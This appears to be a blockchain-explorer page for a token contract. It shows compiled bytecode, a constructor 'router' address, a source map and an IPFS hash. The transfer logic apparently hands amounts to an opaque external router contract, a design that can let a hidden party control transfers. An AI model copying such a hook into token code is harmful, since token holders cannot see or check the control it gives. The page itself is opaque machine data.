0a35050565b60008060006109d86006805461095590610c89565b80601f016020809104026020016040519081016040528092919081815260200182805461098190610c89565b80156109ce5780601f106109a3576101008083540402835291602001916109ce565b820191906000526020600020905b8154815290600101906020018083116109b157829003601f168201915b505050505061052b565b604051633a5b109160e11b81526001600160a01b03888116600483015287811660248301526044820187905291909116906374b62122906064016060604051808303816000875af1158015610a31573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610a559190610db5565b92509250925093509350939050565b60005b83811015610a7f578181015183820152602001610a67565b50506000910152565b6020815260008251806020840152610aa7816040850160208701610a64565b601f01601f19169190910160400192915050565b6001600160a01b038116811461062c57600080fd5b60008060408385031215610ae357600080fd5b8235610aee81610abb565b946020939093013593505050565b600080600060608486031215610b1157600080fd5b8335610b1c81610abb565b92506020840135610b2c81610abb565b929592945050506040919091013590565b600060208284031215610b4f57600080fd5b8135610b5a81610abb565b9392505050565b634e487b7160e01b600052604160045260246000fd5b604051601f8201601f1916810167ffffffffffffffff81118282101715610ba057610ba0610b61565b604052919050565b600067ffffffffffffffff821115610bc257610bc2610b61565b50601f01601f191660200190565b600060208284031215610be257600080fd5b813567ffffffffffffffff811115610bf957600080fd5b8201601f81018413610c0a57600080fd5b8035610c1d610c1882610ba8565b610b77565b818152856020838501011115610c3257600080fd5b81602084016020830137600091810160200191909152949350505050565b60008060408385031215610c6357600080fd5b8235610c6e81610abb565b91506020830135610c7e81610abb565b809150509250929050565b600181811c90821680610c9d57607f821691505b602082108103610cbd57634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b8181038181111561032857610328610cc3565b8082018082111561032857610328610cc3565b600060208284031215610d1157600080fd5b8151610b5a81610abb565b600060208284031215610d2e57600080fd5b815167ffffffffffffffff811115610d4557600080fd5b8201601f81018413610d5657600080fd5b8051610d64610c1882610ba8565b818152856020838501011115610d7957600080fd5b610d8a826020830160208601610a64565b95945050505050565b600082610db057634e487b7160e01b600052601260045260246000fd5b500490565b600080600060608486031215610dca57600080fd5b835192506020840151915060408401519050925092509256fea2646970667358221220330c5086db317dab4d93ac6af04fbc68dea8eee1f3a9b4f6ee585cfaad3530d664736f6c63430008120033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

0000000000000000000000000d811b55c2e892d7e274686aabac9eae7482f461

-----Decoded View---------------
Arg [0] : _router (address): 0x0D811B55c2E892D7E274686AAbaC9Eae7482f461

-----Encoded View---------------
1 Constructor Arguments found :
Arg [0] : 0000000000000000000000000d811b55c2e892d7e274686aabac9eae7482f461


Deployed Bytecode Sourcemap

8063:10220:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;9030:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11656:194;;;;;;:::i;:::-;;:::i;:::-;;;1291:14:1;;1284:22;1266:41;;1254:2;1239:18;11656:194:0;1126:187:1;10149:108:0;10237:12;;10149:108;;;1464:25:1;;;1452:2;1437:18;10149:108:0;1318:177:1;12332:491:0;;;;;;:::i;:::-;;:::i;9992:92::-;;;10075:1;2103:36:1;;2091:2;2076:18;9992:92:0;1961:184:1;13232:290:0;;;;;;:::i;:::-;;:::i;10320:143::-;;;;;;:::i;:::-;-1:-1:-1;;;;;10437:18:0;10410:7;10437:18;;;:9;:18;;;;;;;10320:143;2645:103;;;:::i;:::-;;2214:87;2260:7;2287:6;-1:-1:-1;;;;;2287:6:0;2214:87;;;-1:-1:-1;;;;;2566:32:1;;;2548:51;;2536:2;2521:18;2214:87:0;2402:203:1;9249:104:0;;;:::i;14025:439::-;;;;;;:::i;:::-;;:::i;10515:145::-;;;;;;:::i;:::-;;:::i;11070:200::-;;;;;;:::i;:::-;;:::i;10712:147::-;;;;;;:::i;:::-;;:::i;11333:176::-;;;;;;:::i;:::-;-1:-1:-1;;;;;11474:18:0;;;11447:7;11474:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;11333:176;2903:238;;;;;;:::i;:::-;;:::i;9030:100::-;9084:13;9117:5;9110:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;9030:100;:::o;11656:194::-;11764:4;11781:39;789:10;11804:7;11813:6;11781:8;:39::i;:::-;-1:-1:-1;11838:4:0;11656:194;;;;;:::o;12332:491::-;12472:4;12489:36;12499:6;12507:9;12518:6;12489:9;:36::i;:::-;-1:-1:-1;;;;;12563:19:0;;12536:24;12563:19;;;:11;:19;;;;;;;;789:10;12563:33;;;;;;;;12629:26;;;;12607:116;;;;-1:-1:-1;;;12607:116:0;;4869:2:1;12607:116:0;;;4851:21:1;4908:2;4888:18;;;4881:30;4947:34;4927:18;;;4920:62;-1:-1:-1;;;4998:18:1;;;4991:38;5046:19;;12607:116:0;;;;;;;;;12734:57;12743:6;789:10;12765:25;12784:6;12765:16;:25;:::i;:::-;12734:8;:57::i;:::-;-1:-1:-1;12811:4:0;;12332:491;-1:-1:-1;;;;12332:491:0:o;13232:290::-;789:10;13345:4;13434:25;;;:11;:25;;;;;;;;-1:-1:-1;;;;;13434:34:0;;;;;;;;;;13345:4;;13362:130;;13412:7;;13434:47;;13471:10;;13434:47;:::i;2645:103::-;2260:7;2287:6;-1:-1:-1;;;;;2287:6:0;789:10;2053:23;2045:68;;;;-1:-1:-1;;;2045:68:0;;5673:2:1;2045:68:0;;;5655:21:1;;;5692:18;;;5685:30;5751:34;5731:18;;;5724:62;5803:18;;2045:68:0;5471:356:1;2045:68:0;2710:30:::1;2737:1;2710:18;:30::i;:::-;2645:103::o:0;9249:104::-;9305:13;9338:7;9331:14;;;;;:::i;14025:439::-;789:10;14143:4;14187:25;;;:11;:25;;;;;;;;-1:-1:-1;;;;;14187:34:0;;;;;;;;;;14254:35;;;;14232:122;;;;-1:-1:-1;;;14232:122:0;;6034:2:1;14232:122:0;;;6016:21:1;6073:2;6053:18;;;6046:30;6112:34;6092:18;;;6085:62;-1:-1:-1;;;6163:18:1;;;6156:35;6208:19;;14232:122:0;5832:401:1;14232:122:0;14365:67;789:10;14388:7;14397:34;14416:15;14397:16;:34;:::i;14365:67::-;-1:-1:-1;14452:4:0;;14025:439;-1:-1:-1;;;14025:439:0:o;10515:145::-;10575:12;10624:4;10613:27;;;;;;;;;;;;:::i;11070:200::-;11181:4;11198:42;789:10;11222:9;11233:6;11198:9;:42::i;10712:147::-;10771:17;10824:4;10813:26;;;;;;;;;;;;:::i;2903:238::-;2260:7;2287:6;-1:-1:-1;;;;;2287:6:0;789:10;2053:23;2045:68;;;;-1:-1:-1;;;2045:68:0;;5673:2:1;2045:68:0;;;5655:21:1;;;5692:18;;;5685:30;5751:34;5731:18;;;5724:62;5803:18;;2045:68:0;5471:356:1;2045:68:0;-1:-1:-1;;;;;3006:22:0;::::1;2984:110;;;::::0;-1:-1:-1;;;2984:110:0;;7357:2:1;2984:110:0::1;::::0;::::1;7339:21:1::0;7396:2;7376:18;;;7369:30;7435:34;7415:18;;;7408:62;-1:-1:-1;;;7486:18:1;;;7479:36;7532:19;;2984:110:0::1;7155:402:1::0;2984:110:0::1;3105:28;3124:8;3105:18;:28::i;:::-;2903:238:::0;:::o;17174:378::-;-1:-1:-1;;;;;17310:19:0;;17302:68;;;;-1:-1:-1;;;17302:68:0;;7764:2:1;17302:68:0;;;7746:21:1;7803:2;7783:18;;;7776:30;7842:34;7822:18;;;7815:62;-1:-1:-1;;;7893:18:1;;;7886:34;7937:19;;17302:68:0;7562:400:1;17302:68:0;-1:-1:-1;;;;;17389:21:0;;17381:68;;;;-1:-1:-1;;;17381:68:0;;8169:2:1;17381:68:0;;;8151:21:1;8208:2;8188:18;;;8181:30;8247:34;8227:18;;;8220:62;-1:-1:-1;;;8298:18:1;;;8291:32;8340:19;;17381:68:0;7967:398:1;17381:68:0;-1:-1:-1;;;;;17460:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;17512:32;;1464:25:1;;;17512:32:0;;1437:18:1;17512:32:0;;;;;;;17174:378;;;:::o;14954:661::-;-1:-1:-1;;;;;15094:20:0;;15086:70;;;;-1:-1:-1;;;15086:70:0;;8572:2:1;15086:70:0;;;8554:21:1;8611:2;8591:18;;;8584:30;8650:34;8630:18;;;8623:62;-1:-1:-1;;;8701:18:1;;;8694:35;8746:19;;15086:70:0;8370:401:1;15086:70:0;-1:-1:-1;;;;;15175:23:0;;15167:71;;;;-1:-1:-1;;;15167:71:0;;8978:2:1;15167:71:0;;;8960:21:1;9017:2;8997:18;;;8990:30;9056:34;9036:18;;;9029:62;-1:-1:-1;;;9107:18:1;;;9100:33;9150:19;;15167:71:0;8776:399:1;15167:71:0;-1:-1:-1;;;;;15331:17:0;;15307:21;15331:17;;;:9;:17;;;;;;;15307:21;;15404:33;15341:6;15420:9;15430:6;15404:8;:33::i;:::-;15359:78;;-1:-1:-1;15359:78:0;-1:-1:-1;15359:78:0;-1:-1:-1;15455:11:0;15359:78;;15455:11;:::i;:::-;15448:18;-1:-1:-1;15497:20:0;15448:18;15497:13;:20;:::i;:::-;-1:-1:-1;;;;;15477:17:0;;;;;;;:9;:17;;;;;;:40;;;;15528:20;;;;;;;;:28;;15552:4;;15477:17;15528:28;;15552:4;;15528:28;:::i;:::-;;;;;;;;15589:9;-1:-1:-1;;;;;15572:35:0;15581:6;-1:-1:-1;;;;;15572:35:0;;15600:6;15572:35;;;;1464:25:1;;1452:2;1437:18;;1318:177;15572:35:0;;;;;;;;15075:540;;;;14954:661;;;:::o;3301:191::-;3375:16;3394:6;;-1:-1:-1;;;;;3411:17:0;;;-1:-1:-1;;;;;;3411:17:0;;;;;;3444:40;;3394:6;;;;;;;3444:40;;3375:16;3444:40;3364:128;3301:191;:::o;16450:286::-;16570:7;16579;16588;16633:18;16644:6;16633:18;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:10;:18::i;:::-;16614:114;;-1:-1:-1;;;16614:114:0;;-1:-1:-1;;;;;9660:15:1;;;16614:114:0;;;9642:34:1;9712:15;;;9692:18;;;9685:43;9744:18;;;9737:34;;;16614:89:0;;;;;;;9577:18:1;;16614:114:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;16607:121;;;;;;16450:286;;;;;;;:::o;14:250:1:-;99:1;109:113;123:6;120:1;117:13;109:113;;;199:11;;;193:18;180:11;;;173:39;145:2;138:10;109:113;;;-1:-1:-1;;256:1:1;238:16;;231:27;14:250::o;269:396::-;418:2;407:9;400:21;381:4;450:6;444:13;493:6;488:2;477:9;473:18;466:34;509:79;581:6;576:2;565:9;561:18;556:2;548:6;544:15;509:79;:::i;:::-;649:2;628:15;-1:-1:-1;;624:29:1;609:45;;;;656:2;605:54;;269:396;-1:-1:-1;;269:396:1:o;670:131::-;-1:-1:-1;;;;;745:31:1;;735:42;;725:70;;791:1;788;781:12;806:315;874:6;882;935:2;923:9;914:7;910:23;906:32;903:52;;;951:1;948;941:12;903:52;990:9;977:23;1009:31;1034:5;1009:31;:::i;:::-;1059:5;1111:2;1096:18;;;;1083:32;;-1:-1:-1;;;806:315:1:o;1500:456::-;1577:6;1585;1593;1646:2;1634:9;1625:7;1621:23;1617:32;1614:52;;;1662:1;1659;1652:12;1614:52;1701:9;1688:23;1720:31;1745:5;1720:31;:::i;:::-;1770:5;-1:-1:-1;1827:2:1;1812:18;;1799:32;1840:33;1799:32;1840:33;:::i;:::-;1500:456;;1892:7;;-1:-1:-1;;;1946:2:1;1931:18;;;;1918:32;;1500:456::o;2150:247::-;2209:6;2262:2;2250:9;2241:7;2237:23;2233:32;2230:52;;;2278:1;2275;2268:12;2230:52;2317:9;2304:23;2336:31;2361:5;2336:31;:::i;:::-;2386:5;2150:247;-1:-1:-1;;;2150:247:1:o;2610:127::-;2671:10;2666:3;2662:20;2659:1;2652:31;2702:4;2699:1;2692:15;2726:4;2723:1;2716:15;2742:275;2813:2;2807:9;2878:2;2859:13;;-1:-1:-1;;2855:27:1;2843:40;;2913:18;2898:34;;2934:22;;;2895:62;2892:88;;;2960:18;;:::i;:::-;2996:2;2989:22;2742:275;;-1:-1:-1;2742:275:1:o;3022:186::-;3070:4;3103:18;3095:6;3092:30;3089:56;;;3125:18;;:::i;:::-;-1:-1:-1;3191:2:1;3170:15;-1:-1:-1;;3166:29:1;3197:4;3162:40;;3022:186::o;3213:671::-;3281:6;3334:2;3322:9;3313:7;3309:23;3305:32;3302:52;;;3350:1;3347;3340:12;3302:52;3390:9;3377:23;3423:18;3415:6;3412:30;3409:50;;;3455:1;3452;3445:12;3409:50;3478:22;;3531:4;3523:13;;3519:27;-1:-1:-1;3509:55:1;;3560:1;3557;3550:12;3509:55;3596:2;3583:16;3621:48;3637:31;3665:2;3637:31;:::i;:::-;3621:48;:::i;:::-;3692:2;3685:5;3678:17;3732:7;3727:2;3722;3718;3714:11;3710:20;3707:33;3704:53;;;3753:1;3750;3743:12;3704:53;3808:2;3803;3799;3795:11;3790:2;3783:5;3779:14;3766:45;3852:1;3831:14;;;3847:2;3827:23;3820:34;;;;3835:5;3213:671;-1:-1:-1;;;;3213:671:1:o;3889:388::-;3957:6;3965;4018:2;4006:9;3997:7;3993:23;3989:32;3986:52;;;4034:1;4031;4024:12;3986:52;4073:9;4060:23;4092:31;4117:5;4092:31;:::i;:::-;4142:5;-1:-1:-1;4199:2:1;4184:18;;4171:32;4212:33;4171:32;4212:33;:::i;:::-;4264:7;4254:17;;;3889:388;;;;;:::o;4282:380::-;4361:1;4357:12;;;;4404;;;4425:61;;4479:4;4471:6;4467:17;4457:27;;4425:61;4532:2;4524:6;4521:14;4501:18;4498:38;4495:161;;4578:10;4573:3;4569:20;4566:1;4559:31;4613:4;4610:1;4603:15;4641:4;4638:1;4631:15;4495:161;;4282:380;;;:::o;5076:127::-;5137:10;5132:3;5128:20;5125:1;5118:31;5168:4;5165:1;5158:15;5192:4;5189:1;5182:15;5208:128;5275:9;;;5296:11;;;5293:37;;;5310:18;;:::i;5341:125::-;5406:9;;;5427:10;;;5424:36;;;5440:18;;:::i;6238:259::-;6316:6;6369:2;6357:9;6348:7;6344:23;6340:32;6337:52;;;6385:1;6382;6375:12;6337:52;6417:9;6411:16;6436:31;6461:5;6436:31;:::i;6502:648::-;6582:6;6635:2;6623:9;6614:7;6610:23;6606:32;6603:52;;;6651:1;6648;6641:12;6603:52;6684:9;6678:16;6717:18;6709:6;6706:30;6703:50;;;6749:1;6746;6739:12;6703:50;6772:22;;6825:4;6817:13;;6813:27;-1:-1:-1;6803:55:1;;6854:1;6851;6844:12;6803:55;6883:2;6877:9;6908:48;6924:31;6952:2;6924:31;:::i;6908:48::-;6979:2;6972:5;6965:17;7019:7;7014:2;7009;7005;7001:11;6997:20;6994:33;6991:53;;;7040:1;7037;7030:12;6991:53;7053:67;7117:2;7112;7105:5;7101:14;7096:2;7092;7088:11;7053:67;:::i;:::-;7139:5;6502:648;-1:-1:-1;;;;;6502:648:1:o;9180:217::-;9220:1;9246;9236:132;;9290:10;9285:3;9281:20;9278:1;9271:31;9325:4;9322:1;9315:15;9353:4;9350:1;9343:15;9236:132;-1:-1:-1;9382:9:1;;9180:217::o;9782:306::-;9870:6;9878;9886;9939:2;9927:9;9918:7;9914:23;9910:32;9907:52;;;9955:1;9952;9945:12;9907:52;9984:9;9978:16;9968:26;;10034:2;10023:9;10019:18;10013:25;10003:35;;10078:2;10067:9;10063:18;10057:25;10047:35;;9782:306;;;;;:::o

Swarm Source

ipfs://330c5086db317dab4d93ac6af04fbc68dea8eee1f3a9b4f6ee585cfaad3530d6
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.